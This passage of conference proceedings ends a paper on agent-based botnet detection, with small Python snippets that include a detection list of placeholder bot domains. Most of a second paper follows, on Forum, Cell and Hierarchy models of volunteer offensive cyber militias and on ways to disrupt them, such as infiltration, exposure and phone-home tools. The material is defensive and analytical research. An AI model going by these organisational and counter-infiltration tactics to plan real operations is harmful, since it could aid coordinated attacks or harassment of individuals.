because some malware uses multiple vectors). The vast majority of infections result from<br />
downloads, suggesting this should be the primary threat to mitigate. This is the attitude adopted in this<br />
research, with the recognition that this could change at any time, temporarily or permanently, thus<br />
necessitating a system that is flexible enough to cope with this change.<br />
Several methods to detect and deter botnets have been proposed, such as incorporating data mining<br />
techniques as well as methods to detect communication between the bot and the<br />
master (Masud et al., 2008).<br />
Massively multiplayer online role playing games (MMORPG) battle to differentiate between human and<br />
bot players. Yampolskiy & Govindaraju (2008) studied running processes and network traffic as a<br />
method to distinguish between humans and bots. Chen et al (2009) identified bots in MMORPG<br />
through traffic analysis. They showed amongst others that traffic is distinguishable by (1) the regularity<br />
in the release time of the client command; (2) the trend and magnitude of traffic burstiness in multiple<br />
time scales; and (3) the sensitivity to different network connections. Thawonmas et al (2008) conduct<br />
behaviour analysis within this gaming environment and implement methods focusing on resource<br />
gathering and trading behavior. Traffic classification is also performed by Li et al (2009), with<br />
Lu et al (2009) proposing a hierarchical framework to automatically discover botnets. They first<br />
classify network traffic into different application communities by using payload signatures.<br />
Virtual bots have also been introduced as a method to create uncertainty in the botnet market. Li et al<br />
(2008) took a different approach by looking at botnet disabling mechanisms from an economic<br />
perspective. This links to methods looking at the collective behavior of bots, i.e. studying the focus and<br />
deriving solutions from there (Pathak et al., 2009; Stone-Gross et al., 2009). Xie et al (2008)<br />
characterize botnets by leveraging spam payload and spam server traffic properties. They identify<br />
botnet hosts by generating botnet spam signatures from emails. Ramachandran & Feamster (2006)<br />
studied the network-level behavior of spammers. They identified specific characteristics, such as that<br />
spam is sent from a few regions of IP address space. They also propose that developing<br />
algorithms to identify botnet memberships need to be based on network level properties. Staying on<br />
the network level, Villamarín-Salomón & Brustoloni (2009) propose a Bayesian approach for detecting<br />
bots based on the similarity of their DNS traffic to that of known bots.<br />
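As a much-simplified stand-in for this DNS-similarity idea (Villamarín-Salomón & Brustoloni use a proper Bayesian model; here a plain Jaccard similarity over queried domains is assumed, just to illustrate the intuition):<br />

```python
def jaccard(a, b):
    """Set overlap: |A ∩ B| / |A ∪ B|, 0.0 when both sets are empty."""
    return len(a & b) / len(a | b) if a | b else 0.0

KNOWN_BOT_QUERIES = {"cc1.evil.example", "cc2.evil.example", "update.evil.example"}

def dns_similarity_alert(host_queries, threshold=0.5):
    """Alert when a host's DNS lookups closely resemble known bot lookups."""
    return jaccard(host_queries, KNOWN_BOT_QUERIES) >= threshold

print(dns_similarity_alert({"cc1.evil.example", "cc2.evil.example"}))  # True
print(dns_similarity_alert({"example.org", "wikipedia.org"}))          # False
```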
A detailed look into the solutions summarized above led us to propose a design incorporating the use<br />
of intelligent SA as a counter to botnets. Our design incorporates the different aspects and required<br />
characteristics detailed in the literature, and is the next step in elaborating our proposed<br />
framework (Dembskey, Biermann 2008), in which we propose three<br />
layers, namely IDS, Observer and Communication.<br />
Figure 1: Three layers (IDS, Observer, Communication Layer)<br />
Using these layers as our starting point we introduce sub-layers and descriptions as depicted in<br />
Figure 2. We only focus on the Observer and IDS layers.<br />
The observer layer consists of five sub-layers all focusing on gathering information:<br />
Collective Behaviour<br />
Communication Analysis<br />
Resource Gathering<br />
Spreading & Growth Patterns<br />
Network Traffic Analysis<br />
Each of these sub-layers focuses on particular aspects of gathering information through observation.<br />
This observation is conducted through a focused software agent network.<br />
Within network traffic analysis, intensive signature analyses are conducted in order to provide data to<br />
the IDS layer. From these analyses, information on spreading and growth patterns is gathered and<br />
models proposed. Resource gathering focuses on observing specifics such as bandwidth depletion<br />
and resource utilization. Communication analysis refers to the communications taking place between<br />
bots and masters and the analysis thereof. This will assist in determining the collective behaviour or<br />
focus of the botnet as well as assist in detailing the economic focus.<br />
The information gathered within the observer layer is used as input to the IDS layer. The IDS layer will<br />
function as both a HIDS and a NIDS; that is, it will have operational agents on hosts and servers. The<br />
IDS layer includes the following:<br />
Infiltrate and disable<br />
Spawn Intelligent Software Agent Network<br />
Classification<br />
The information gathered within the observer level is used to classify the botnet, and according to the<br />
classification an intelligent software agent network is spawned to infiltrate and ultimately disable the<br />
botnet.<br />
Agentification of email client and server software, host and server monitoring software, host and<br />
server firewall and AV software, network monitoring software and user monitoring software is required,<br />
or at least the capability to interface with these applications.<br />
It is anticipated that the crowd sourcing component will function on two layers. Firstly, SA from<br />
different organizations will communicate threats amongst themselves with minimal supervision.<br />
Secondly, information will be sourced from human beings. Both open and proprietary sources should<br />
be used, but the following two points must be kept in mind. Firstly, the use of proprietary systems will have a<br />
cost implication, and that data may not legally be allowed to propagate through the entire<br />
SA system. Secondly, the possibility of attack vectors being introduced is a real concern – if crowd<br />
sourcing results in false positives through concerted and purposeful false reporting, then<br />
a DoS attack may occur, with the system’s SA falsely identifying normal activity as malicious and halting it.<br />
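One simple way to blunt this false-report risk is to act only when several independent reporters, weighted by past reliability, agree. A sketch under our own assumptions (the thresholds, weights and reporter names are invented):<br />

```python
def should_block(reports, reporter_weight, min_score=2.0, min_reporters=3):
    """Act only when enough distinct reporters, weighted by past accuracy,
    agree that a target is malicious. A few colluding low-reputation
    reporters then cannot trigger a block on their own."""
    reporters = set(reports)
    score = sum(reporter_weight.get(r, 0.1) for r in reporters)
    return len(reporters) >= min_reporters and score >= min_score

weights = {"org-a": 1.0, "org-b": 0.9, "org-c": 0.8, "sock1": 0.1, "sock2": 0.1}
print(should_block(["org-a", "org-b", "org-c"], weights))  # True
print(should_block(["sock1", "sock2", "sock1"], weights))  # False: too few
```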
A robust and up-to-date system that can share data on the safety of web sites and software will<br />
mitigate the risk from the primary sources of infection discussed above. In the opinion of the authors,<br />
CYBEX (ITU-T X.1500) is the correct path to follow to implement this system.<br />
As part of this research we will implement and test a model of the proposed system against a variety<br />
of botnets. The model will not be comprehensive and will focus on mitigating threats launched via<br />
drive-by downloads and locally installed software. The network of NIDS and HIDS with the crowd<br />
sourcing component will be implemented.<br />
We must also consider the impact of virtualization and the trend towards cloud and grid computing,<br />
which we think will continue. It is also not the intention that this system is entirely automated, as the<br />
effect of systemic failure may be worse than anticipated and human intervention may serve to mitigate<br />
this risk.<br />
In summary, we propose to model and implement a proof-of-concept of an integrated SA botnet<br />
defense system. Some challenges of developing such a system are its complexity and human privacy<br />
requirements and laws. Rather than be daunted by this, we believe that the effort will be well<br />
rewarded and will identify future areas of research.<br />
Figure 2: Observer and IDS layers (IDS level: Infiltrate and Disable; Spawn Intelligent Software Agent Network; Classification. Observer level: Collective Behavior; Communication Analysis; Resource Gathering; Spreading & Growth Patterns; Network Traffic Analysis)<br />
References<br />
Bailey, M., Cooke, E., Jahanian, F., Xu, Y. & Karir, M. 2009, "A survey of botnet technology and defenses",<br />
Proceedings of the 2009 Cybersecurity Applications & Technology <strong>Conference</strong> for Homeland Security-<br />
Volume 00, IEEE Computer Society, pp. 299.<br />
Bigus, J.P. & Bigus, J. 2001, Constructing intelligent agents using Java, Wiley New York.<br />
Carr, J. & Shepherd, L. 2010, Inside cyber warfare, 1st edn, O'Reilly Media, Inc., Sebastopol, Calif.<br />
Chen, K., Jiang, J., Huang, P., Chu, H., Lei, C. & Chen, W. 2009. Identifying MMORPG Bots: A Traffic Analysis<br />
Approach. EURASIP Journal on Advances in signal Processing. Volume 2009, Article 3.<br />
Chiang, K. & Lloyd, L. 2007. A Case Study of the Rustock Rootkit and Spam Bot. Proceedings of the First<br />
Workshop on Hot Topics in Understanding Botnets, Cambridge, MA.<br />
Cruz, M. 2008, Most Abused Infection Vector. Available: http://blog.trendmicro.com/most-abused-infectionvector/<br />
[2010, 9/27/2010].<br />
Damballa Inc. 2009. Update on the Enemy: A deconstruction of who profits from botnets. Available:<br />
http://www.damballa.com/downloads/d_pubs/WP%20Update%20on%20the%20Enemy%20(2009-05-<br />
13).pdf<br />
Dembskey, E. & Biermann, E. 2008, "Software agent framework for computer network operations in IW",<br />
Proceedings of the 3rd International <strong>Conference</strong> On Information Warfare And Security, ed. L. Armistead,<br />
ACL, pp. 127.<br />
Denning, P.J. & Denning, D.E. 2010, "Discussing cyber attack", Commun.ACM, vol. 53, no. 9, pp. 29-31.<br />
Dunham, K. & Melnick, J. 2009, Malicious Bots: An Inside Look Into the Cyber-Criminal Underground of the<br />
Internet, Auerbach Publications.<br />
Jansen van Vuuren, J., Phahlamohlaka, J. & Brazzoli, M. 2010, "The Impact of the Increase in Broadband<br />
Access on South African National Security and the Average citizen", Proceedings of the 5th International<br />
<strong>Conference</strong> on Information Warfare and Security, ed. L. Armistead, ACL , pp. 171.<br />
Knapp, K.J. & Boulton, W.R. 2008, "Ten Information Warfare Trends" in Cyber Warfare and Cyber Terrorism,<br />
eds. Kenneth Knapp & William Boulton, IGI Global, US; Hershey, PA, pp. 17-25.<br />
Li, Z., Liao, Q & Striegel, A. 2008. Botnet Economics: Uncertainty Matters. Workshop on the Economics of<br />
Information Security (WEIS 2008), London, England.<br />
Li, Z., Goyal, A., Chen, Y. & Paxson, V. 2009. Automating Analysis of Large-Scale Botnet Probing Events.<br />
Proceedings of the 4th International Symposium on Information, Computer and Communications Security.<br />
Sydney, Australia.<br />
Liu, J. 2001, Autonomous agents and multi-agent systems: explorations in learning, self-organization, and<br />
adaptive computation, World Scientific.<br />
Liu, J., Xiao, Y., Ghaboosi, K., Deng, H. & Zhang, J. 2009. Botnet: Classification, Attacks, Detection, Tracing and<br />
Preventive measures. EURASIP Journal on Wireless Communications and Networking, Volume 2009.<br />
Hindawi Publishing Corporation.<br />
Lu, W. Tavallaee, M. & Ghorbani, AA. 2009. Automatic Discovery of Botnet Communities on Large-Scale<br />
Communication Networks. Proceedings of the 4th International Symposium on Information, Computer and<br />
Communications Security. Sydney, Australia.<br />
Masud, MM., Gao, J., Khan, L., Han, J. & Thuraisingham, B. 2008. Peer to Peer Botnet Detection for Cyber-<br />
Security: A Data Mining Approach. In: Proceedings of the 4th Annual Workshop on Cyber Security and<br />
Information Intelligence Research: developing strategies to meet the cyber security and information<br />
intelligence challenges ahead. Oak Ridge, Tennessee.<br />
Microsoft, 2010. Download details: Microsoft Security Intelligence Report volume 8 (July - December 2009).<br />
Available: http://www.microsoft.com/downloads/details.aspx?FamilyID=2c4938a0-4d64-4c65-b951-<br />
754f4d1af0b5&displaylang=en [7/21/2010].<br />
Murch, R. & Johnson, T. 1999, Intelligent software agents, Prentice Hall PTR.<br />
National Research Council (U.S.). Committee on the Role of Information Technology in Responding to Terrorism,<br />
Hennessy, J.L., Patterson, D.A., Lin, H. & National Academies Press 2003, Information technology for<br />
counterterrorism: immediate actions and future possibilities, National Academies Press, Washington, D.C.<br />
OECD (Organization for Economic Co-operation and Development). 2007. Malicious Software (Malware): A<br />
Security Threat to the Internet Community. Ministerial Background Report [Online]. Available:<br />
http://www.oecd.org/dataoecd/53/34/40724457.pdf<br />
Ollmann, G. 2010, "Asymmetrical Warfare: Challenges and Strategies for Countering Botnets", The 5th<br />
International <strong>Conference</strong> on Information Warfare & Security, ACI, Reading, England, pp. 507.<br />
Oram, A. & Viega, J. 2009, Beautiful security, 1st edn, O'Reilly, Sebastopol, CA.<br />
Padgham, L. & Winikoff, M. 2004, Developing intelligent agent systems: a practical guide, Wiley.<br />
Pathak, A., Qian, F., Hu, Y.C., Mao, ZM. & Ranjan, S. 2009. Botnet Spam Campaigns Can Be Long Lasting:<br />
Evidence, Implications, and Analysis. Proceedings of the 11th International Joint <strong>Conference</strong> on<br />
Measurement and Modeling of Computer Systems. SIGMETRICS / Performance'09, June 15-19, 2009,<br />
Seattle, WA.<br />
Porras, P. 2009. Reflections on Conficker: An insider's view of the analysis and implications of the Conficker<br />
conundrum. CACM 52 (10). October.<br />
Prince, B. 2010, Russian Cybercrime: Geeks, Not Gangsters | eWEEK Europe UK. Available:<br />
http://www.eweekeurope.co.uk/knowledge/russian-cybercrime-geeks-not-gangsters-9182/2 [2010,<br />
8/30/2010].<br />
Ramachandran, A. & Feamster, N. 2006. Understanding the Network Level Behavior of Spammers. Proceedings<br />
of the 2006 <strong>Conference</strong> on Applications, Technologies, Architectures and Protocols for Computer<br />
Communications, SIGCOMM’06, September 11-15, 2006, Pisa, Italy.<br />
Schiller, C.A., Binkley, J. & Harley, D. 2007, Botnets: the killer web app, Syngress Media Inc.<br />
Smith, G. 1998, Issues in S and T, Fall 1998, An Electronic Pearl Harbor? Not Likely. Available:<br />
http://www.issues.org/15.1/smith.htm [2010, 8/16/2010].<br />
Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B. & Szydlowski, M. 2009. Your Botnet is My Botnet: Analysis<br />
of a Botnet Takeover. Proceedings of the 16th ACM <strong>Conference</strong> on Computer and Communications<br />
Security. CCS’09, November 9–13, 2009, Chicago, Illinois, USA.<br />
Stytz, M.R. & Banks, S.B. 2008, Toward Intelligent Agents For Detecting Cyberattacks.<br />
Thawonmas, R. Kashifuji, Y. & Chen, K. 2008. Detection of MMORPG Bots Based on Behavior Analysis.<br />
Proceedings of the 2008 International <strong>Conference</strong> on Advances in Computer Entertainment Technology.<br />
Yokohama, Japan.<br />
Villamarín-Salomón, R. & Brustoloni, JC. 2009. Bayesian Bot Detection Based on DNS Traffic Similarity.<br />
Proceedings of the 2009 ACM symposium on Applied Computing, SAC’09, March 8-12, 2009, Honolulu,<br />
Hawaii, U.S.A.<br />
Wang, Y., Gu, D., Xu, J. & Du, H. 2009. Hacking Risk Analysis of Web Trojan in Electric Power System. In:<br />
Proceedings of the International <strong>Conference</strong> on Web Information Systems and Mining. Shanghai, China.<br />
Williams, C.W. 2008, Carpet bombing in cyberspace - May 2008 - Armed Forces Journal - Military Strategy,<br />
Global Defense Strategy. Available: http://www.armedforcesjournal.com/2008/05/3375884 [2010,<br />
7/20/2010].<br />
Yampolskiy, R.V. & Govindaraju, V. 2008. Embedded Non-interactive Continuous Bot Detection. ACM Computers<br />
in Entertainment, Vol. 5, No. 4, Article 7. Publication Date: March 2008.<br />
Xie, Y., Yu, F., Achan, K., Panigrahy, R., Hulten, G. & Osipkov, I. 2008. Spamming Botnets: Signatures and<br />
Characteristics. Proceedings of the 2008 <strong>Conference</strong> on Applications, Technologies, Architectures and<br />
Protocols for Computer Communications, SIGCOMM’08, August 17–22, 2008, Seattle, Washington.<br />
Theoretical Offensive Cyber Militia Models<br />
Rain Ottis<br />
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia<br />
rain.ottis@ccdcoe.org<br />
Abstract: Volunteer-based non-state actors have played an important part in many international cyber conflicts of<br />
the past two decades. In order to better understand this threat, I describe three theoretical models for<br />
volunteer-based offensive cyber militias: the Forum, the Cell and the Hierarchy. The Forum is an ad-hoc cyber<br />
militia form that is organized around a central communications platform, where members share the information and<br />
tools necessary to carry out cyber attacks against their chosen adversary. The Cell model refers to hacker cells,<br />
which engage in politically motivated hacking over extended periods of time. The Hierarchy refers to the traditional<br />
hierarchical model, which may be encountered in government sponsored volunteer organizations, as well as in<br />
cohesive self-organized non-state actors. For each model, I give an example and describe the model’s attributes,<br />
strengths and weaknesses using qualitative analysis. The models are based on expert opinion on the different types<br />
of cyber militias that have been seen in cyber conflicts. These theoretical models provide a framework for<br />
categorizing volunteer-based offensive cyber militias of non-trivial size.<br />
Keywords: cyber conflict, cyber militia, cyber attack, patriotic hacking, on-line communities<br />
1. Introduction<br />
The widespread application of Internet services has given rise to a new contested space, where<br />
people with conflicting ideals or values strive to succeed, sometimes by attacking the systems and<br />
services of the other side. It is interesting to note that in most public cases of cyber conflict the<br />
offensive side is not identified as a state actor, at least not officially. Instead, it often looks like citizens<br />
take part in hacktivist campaigns or patriotic hacking on their own, volunteering for the cyber front.<br />
Cases like the 2007 cyber attacks against Estonia are a good example of how an informal non-state<br />
cyber militia can become a threat to national security. In order to understand the threat posed by<br />
these volunteer cyber militias, I provide three models of how such groups can be organized and<br />
analyze the strengths and weaknesses of each.<br />
The three models considered are the Forum, the Cell and the Hierarchy. The models are applicable to<br />
groups of non-trivial size, which require internal assignment of responsibilities and authority.<br />
1.1 Method and limitations<br />
In this paper I use theoretical qualitative analysis in order to describe the attributes, strengths and<br />
weaknesses of three offensively oriented cyber militia models. I have chosen the three plausible<br />
models based on what can be observed in recent cyber conflicts. The term model refers to an abstract<br />
description of relationships between members of the cyber militia, including command, control and<br />
mentoring relationships, as well as the operating principles of the militia.<br />
Note, however, that the description of the models is based on theoretical reasoning and expert<br />
opinion. It offers abstract theoretical models in an ideal setting. There may not be a full match to any<br />
of them in reality or in the examples provided. It is more likely to see either combinations of different<br />
models or models that do not match the description in full. On the other hand, the models should<br />
serve as useful frameworks for analyzing volunteer groups in the current and coming cyber conflicts.<br />
In preparing this work, I communicated with and received feedback from a number of recognized<br />
experts in the field of cyber conflict research. I wish to thank them all for providing comments on my<br />
proposed models: Prof Dorothy Denning (Naval Postgraduate School), Dr Jose Nazario (Arbor<br />
Networks), Prof Samuel Liles (Purdue University Calumet), Mr Jeffrey Carr (Greylogic) and Mr<br />
Kenneth Geers (Cooperative Cyber Defence Centre of Excellence).<br />
2. The forum<br />
The global spread of the Internet allows people to connect easily and form “cyber tribes”, which can<br />
range from benign hobby groups to antagonistic ad-hoc cyber militias. (Williams 2007, Ottis 2008,<br />
Carr 2009, Nazario 2009, Denning 2010) In the case of an ad-hoc cyber militia, the Forum unites like-minded<br />
people who are “willing and able to use cyber attacks in order to achieve a political goal.”<br />
(Ottis 2010b) It serves as a command and control platform where more active members can post<br />
motivational materials, attack instructions, attack tools, etc. (Denning 2010)<br />
This particular model, as well as the strengths and weaknesses covered in this section, are based on<br />
(Ottis 2010b). A good example of this model in recent cyber conflicts is the stopgeorgia.ru forum<br />
during the Russia-Georgia war in 2008 (Carr 2009).<br />
2.1 Attributes<br />
The Forum is an on-line meeting place for people who are interested in a particular subject. I use<br />
Forum as a conceptual term referring to the people who interact in the on-line meeting place. The<br />
technical implementation of the meeting place could take many different forms: web forum, Internet<br />
Relay Chat channel, social network subgroup, etc. It is important that the Forum is accessible over the<br />
Internet and preferably easy to find. The latter condition is useful for recruiting new members and<br />
providing visibility to the agenda of the group.<br />
The Forum mobilizes in response to an event that is important to the members. While there can be a<br />
core group of people who remain actively involved over extended periods of time, the membership<br />
can be expected to surge in size when the underlying issue becomes “hot”. Basically, the Forum is<br />
like a flash mob that performs cyber attacks instead of actions on the streets. As such, the Forum is<br />
more ad-hoc than permanent, because it is likely to disband once the underlying event is settled.<br />
The membership of the Forum forms a loose network centered on the communications platform,<br />
where few, if any, people know each other in real life and the entire membership is not known to any<br />
single person (Ottis 2010b). Most participate anonymously, either providing an alias or by remaining<br />
passive on the communication platform. In general, the Forum is an informal group, although specific<br />
roles can be assumed by individual members. For example, there could be trainers, malware<br />
providers, campaign planners, etc. (Ottis 2010b) Some of the Forum members may also be active in<br />
cyber crime. In that case, they can contribute resources such as malware or use of a botnet to the<br />
Forum.<br />
The membership is diverse in terms of skills, resources and location. While there is evidence<br />
that many of the individuals engaged in such activities are relatively unskilled in cyber attack<br />
techniques (Carr 2009), a few more experienced members can make the group<br />
much more effective and dangerous (Ottis 2010a).<br />
Since most of the membership remains anonymous and often passive on the communications<br />
platform, the leadership roles will be assumed by those who are active in communicating their intent,<br />
plans and expertise. (Denning 2010) However, this still does not allow for strong command and<br />
control, as each member can decide what, if any, action to take.<br />
2.2 Strengths<br />
One of the most important strengths of a loose network is that it can form very quickly. Following an<br />
escalation in the underlying issue, all it takes is a rallying cry on the Internet and within hours or even<br />
minutes the volunteers can gather around a communications platform, share attack instructions, pick<br />
targets and start performing cyber attacks.<br />
As long as there is no need for tightly controlled operations, in terms of timing, resource use and<br />
targeting, there is very little need for management. The network is also easily scalable, as anyone can<br />
join and there is no lengthy vetting procedure.<br />
The diversity of the membership means that it is very difficult for the defenders to analyze and counter<br />
the attacks. The source addresses are likely distributed globally (blacklisting will be ineffective) and<br />
the different skills and resources ensure heterogeneous attack traffic (no easy patterns). In addition,<br />
experienced attackers can use this to conceal precision strikes against critical services and systems.<br />
While it may seem that neutralizing the communications platform (via law enforcement action, cyber<br />
attack or otherwise) is an easy way to neutralize the militia, this may not be the case. The militia can<br />
easily regroup at a different communications platform in a different jurisdiction. Attacking the Forum<br />
directly may actually increase the motivation of the members. (Ottis 2010b)<br />
Last, but not least, it is very difficult to attribute these attacks to a state, as they can (seem to) be a<br />
true (global) grass roots campaign, even if there is some form of state sponsorship. Some states may<br />
take advantage of this fact by allowing such activity to continue in their jurisdiction, blaming legal<br />
obstacles or lack of capability for their inactivity. It is also possible for government operatives to<br />
“create” a “grass roots” Forum movement in support of the government agenda. (Ottis 2009)<br />
2.3 Weaknesses<br />
A clear weakness of this model is the difficulty of commanding and controlling the Forum. Membership is not<br />
formalized and often not even visible on the communication platform, because passive readers<br />
can simply take ideas from there and execute the attacks on their own. This uncoordinated approach can<br />
seriously hamper the effectiveness of the group as a whole. It may also lead to uncontrolled<br />
expansion of conflict, when members unilaterally attack third parties on behalf of the Forum.<br />
A problem with the loose network is that it is often populated with people who do not have experience<br />
with cyber attacks. Therefore, their options are limited to primitive manual attacks or preconfigured<br />
automated attacks using attack kits or malware. (Ottis 2010a) They are highly reliant on instructions<br />
and tools from more experienced members of the Forum.<br />
The Forum is also prone to infiltration, as it must rely on relatively easily accessible communication<br />
channels. If the communication point is hidden, the group will have difficulties in recruiting new<br />
members. The assumption is, therefore, that the communication point can be easily found by<br />
potential recruits as well as infiltrators. Since there is no easy way to vet incoming members,<br />
infiltration should be relatively simple.<br />
Another potential weakness of the Forum model is the presumption of anonymity. If the membership<br />
can be infiltrated and convinced that their anonymity is not guaranteed, they will be less likely to<br />
participate in the cyber militia. Options for achieving this can include “exposing” the “identities” of the<br />
infiltrators, arranging meetings in real life, offering tools that have a phone-home functionality to the<br />
members, etc. Note that some of these options may be illegal, depending on the circumstances. (Ottis<br />
2010b)<br />
3. The cell<br />
Another model for a volunteer cyber force that has been seen is a hacker cell. In this case, the<br />
generic term hacker is used to encompass all manner of people who perform cyber attacks on their<br />
own, regardless of their background, motivation and skill level. It includes the hackers, crackers and<br />
script kiddies described by Young and Aitel (2004). The hacker cell includes several hackers who<br />
commit cyber attacks on a regular basis over extended periods of time. Examples of hacker cells are<br />
Team Evil and Team Hell, as described in Carr (2009).<br />
3.1 Attributes<br />
Unlike Forum members, Cell members are likely to know each other in real life, while remaining<br />
anonymous to the outside observer. Since their activities are almost certainly illegal, they need to trust<br />
each other. This limits the size of the group and requires a (lengthy) vetting procedure for any new<br />
recruits. The vetting procedure can include proof of illegal cyber attacks.<br />
The command and control structure of the Cell can vary from a clear self-determined hierarchy to a<br />
flat organization, where members coordinate their actions, but do not give or receive orders. In theory,<br />
several Cells can coordinate their actions in a joint campaign, forming a confederation of hacker cells.<br />
The Cells can exist for a long period of time, in response to a long-term problem, such as the Israel-<br />
Palestine conflict. The activity of such a Cell ebbs and flows in accordance with the intensity of the<br />
underlying conflict. The Cell may even disband for a period of time, only to reform once the situation<br />
intensifies again.<br />
Since hacking is a hobby (potentially a profession) for the members, they are experienced with the<br />
use of cyber attacks. One of the more visible types of attacks that can be expected from a Cell is the<br />
website defacement. Defacement refers to the illegal modification of website content, which often<br />
includes a message from the attacker, as well as the attacker’s affiliation. The Zone-H web archive<br />
lists thousands of examples of such activity, as reported by the attackers. Many of the attacks are<br />
clearly politically motivated and identify the Cell that is responsible.<br />
Some members of the Cell may be involved with cyber crime. For example, the development,<br />
dissemination, maintenance and use of botnets for criminal purposes. These resources can be used<br />
for politically motivated cyber attacks on behalf of the Cell.<br />
3.2 Strengths<br />
A benefit of the Cell model is that it can mobilize very quickly, as the actors presumably already have<br />
each other’s contact information. In principle, the Cell can mobilize within minutes, although it likely<br />
takes hours or days to complete the process.<br />
A Cell is quite resistant to infiltration, because the members can be expected to establish their hacker<br />
credentials before being allowed to join. This process may include proof of illegal attacks.<br />
Since the membership can be expected to be experienced in cyber attack techniques, the Cell can be<br />
quite effective against unhardened targets. However, hardened targets may or may not be within the<br />
reach of the Cell, depending on their specialty and experience. Prior hacking experience also allows<br />
them to cover their tracks better, should they wish to do so.<br />
3.3 Weaknesses<br />
While the Cell model is more resistant to countermeasures than the Forum model, it still presents potential<br />
weaknesses to exploit. The first opportunity for exploitation is the hacker’s ego. Many of the more<br />
visible attacks, including defacements, leave behind the alias or affiliation of the attacker, in order to<br />
claim bragging rights. (Carr 2009) This seems to indicate that they are quite confident in their skills<br />
and proud of their achievements. As such, they are potentially vulnerable to personal attacks, such as<br />
taunting or ridiculing in public. Stripping the anonymity of the Cell may also work, as at least some<br />
members could lose their job and face law enforcement action in their jurisdiction. (Carr 2009) As<br />
described by Ottis (2010b), it is probably not necessary to actually identify all the members of the Cell.<br />
Even if the identity of a few of them is revealed or if the corresponding perception can be created<br />
among the membership, the trust relationship will be broken and the effectiveness of the group will<br />
decrease.<br />
Prior hacking experience also provides a potential weakness. It is more likely that law<br />
enforcement knows the identity of a hacker, especially if he or she continues to use the same affiliation<br />
or hacker alias. While there may not be enough evidence, damage or legal basis for law<br />
enforcement action in response to their criminal attacks, politically motivated attacks may fall under<br />
a different set of rules for the local law enforcement.<br />
The last problem with the Cell model is scalability. There are only so many skilled hackers who are<br />
willing to participate in a politically motivated cyber attack. While this number may still overwhelm a<br />
small target, it is unlikely to have a strong effect on a large state.<br />
4. The hierarchy<br />
The third option for organizing a volunteer force is to adopt a traditional hierarchical structure. This<br />
approach is more suitable for government sponsored groups or other cohesive groups that can agree<br />
to a clear chain of command. For example, the People’s Liberation Army of China is known to include<br />
militia-type units in their IW battalions. (Krekel 2009) The model can be divided into two generic sub-models:<br />
anonymous and identified membership.<br />
4.1 Attributes<br />
The Hierarchy model is similar in concept to military units, where a unit commander exercises power<br />
over a limited number of sub-units. The number of command levels depends on the overall size of the<br />
organization.<br />
Each sub-unit can specialize in a specific task or role. For example, the list of sub-unit roles can<br />
include reconnaissance, infiltration/breaching, exploitation, malware/exploit development and training.<br />
Depending on the need, there can be multiple sub-units with the same role. Consider the analogy of<br />
an infantry battalion, which may include a number of infantry companies, anti-tank and mortar<br />
platoons, a reconnaissance platoon, as well as various support units (communications, logistics), etc.<br />
This specialization and role assignment allows the militia unit to conduct a complete offensive cyber<br />
operation from start to finish.<br />
A Hierarchy model is the most likely option for a state sponsored entity, since it offers a more<br />
formalized and understandable structure, as well as relatively strong command and control ability. The<br />
control ability is important, as the actions of a state sponsored militia are by definition attributable to<br />
the state.<br />
However, a Hierarchy model is not an automatic indication of state sponsorship. Any group that is<br />
cohesive enough to determine a command structure amongst them can adopt a hierarchical structure.<br />
This is very evident in Massively Multiplayer Online Games (MMOG), such as World of Warcraft or<br />
EVE Online, where players often form hierarchical groups (guilds, corporations, etc.) in order to<br />
achieve a common goal. The same approach is possible for a cyber militia as well. In fact, Williams<br />
(2007) suggests that gaming communities can be a good recruiting ground for a cyber militia.<br />
While a state sponsored militia can be expected to have identified membership (though it may remain<br />
anonymous to the outside observer) for control reasons, a non-state militia can consist of<br />
anonymous members who are only identified by their screen names.<br />
4.2 Strengths<br />
The obvious strength of a hierarchical militia is the potential for efficient command and control. The<br />
command team can divide the operational responsibilities to specialized sub-units and make sure that<br />
their actions are coordinated. However, this strength may be wasted by incompetent leadership or<br />
other factors, such as overly restrictive operating procedures.<br />
A hierarchical militia may exist for a long time even without an ongoing conflict. During “peacetime”, the<br />
militia’s capabilities can be improved with recruitment and training. This degree of formalized<br />
preparation with no immediate action in sight is something that can set the hierarchy apart from the<br />
Forum and the Cell.<br />
If the militia is state sponsored, then it can enjoy state funding and infrastructure, as well as cooperation<br />
from other state entities, such as law enforcement or the intelligence community. This would allow the<br />
militia to concentrate on training and operations.<br />
4.3 Weaknesses<br />
A potential issue with the Hierarchy model is scalability. Since this approach requires some sort of<br />
vetting or background checks before admitting a new member, it may be time consuming and<br />
therefore slow down the growth of the organization.<br />
Another potential issue with the Hierarchy model is that by design there are key persons in the<br />
hierarchy. Those persons can be targeted by various means to ensure that they will not be effective or<br />
available during a designated period, thus diminishing the overall effectiveness of the militia. A<br />
hierarchical militia may also have issues with leadership if several people contend for prestigious<br />
positions. This potential rift in the cohesion of the unit can potentially be exploited by infiltrator agents.<br />
Any activities attributed to a state sponsored militia can further be attributed to the state. This puts<br />
heavy restrictions on the use of a cyber militia “during peacetime”, as the legal framework surrounding<br />
state use of cyber attacks is currently unclear. However, in a conflict scenario, state attribution is<br />
likely not a problem, because the state is party to the conflict anyway. This means that a state<br />
sponsored offensive cyber militia is primarily useful as a defensive capability between conflicts. Only<br />
during conflict can it be used in its offensive role.<br />
While a state sponsored cyber militia may be more difficult (but not impossible) to infiltrate, they are<br />
vulnerable to public information campaigns, which may lead to low public and political support,<br />
decreased funding and even official disbanding of the militia. On the other hand, if the militia is not<br />
state sponsored, then it is prone to infiltration and internal information operations similar to those<br />
considered for the Forum model.<br />
Of the three models, the Hierarchy probably takes the longest to establish, as the chain of command<br />
and role assignments are settled. During this process, which could take days, months or even years,<br />
the militia is relatively inefficient and likely unable to perform any complex operations.<br />
5. Comparison<br />
When analyzing the three models, it quickly becomes apparent that some aspects are<br />
common to all of them. First, they are not constrained by location. While the Forum and the Cell are by<br />
default dispersed, even a state sponsored hierarchical militia can operate from different locations.<br />
Second, since they are organizations consisting of humans, one of the more potent ways to<br />
neutralize cyber militias is through information operations, such as persuading members that their<br />
identities have become known to law enforcement.<br />
Third, all three models benefit from a certain level of anonymity. However, this also makes them<br />
susceptible to infiltration, as it is difficult to verify the credentials and intent of a new member.<br />
On the other hand, there are differences as well. Only one model, the Hierarchy, lends itself well to state<br />
sponsored entities, although, in principle, it is possible to use all three approaches to bolster a<br />
state’s cyber power.<br />
The requirement for a formalized chain of command and division of responsibilities means that the initial<br />
mobilization of the Hierarchy can be expected to take much longer than that of the more ad-hoc Forum or<br />
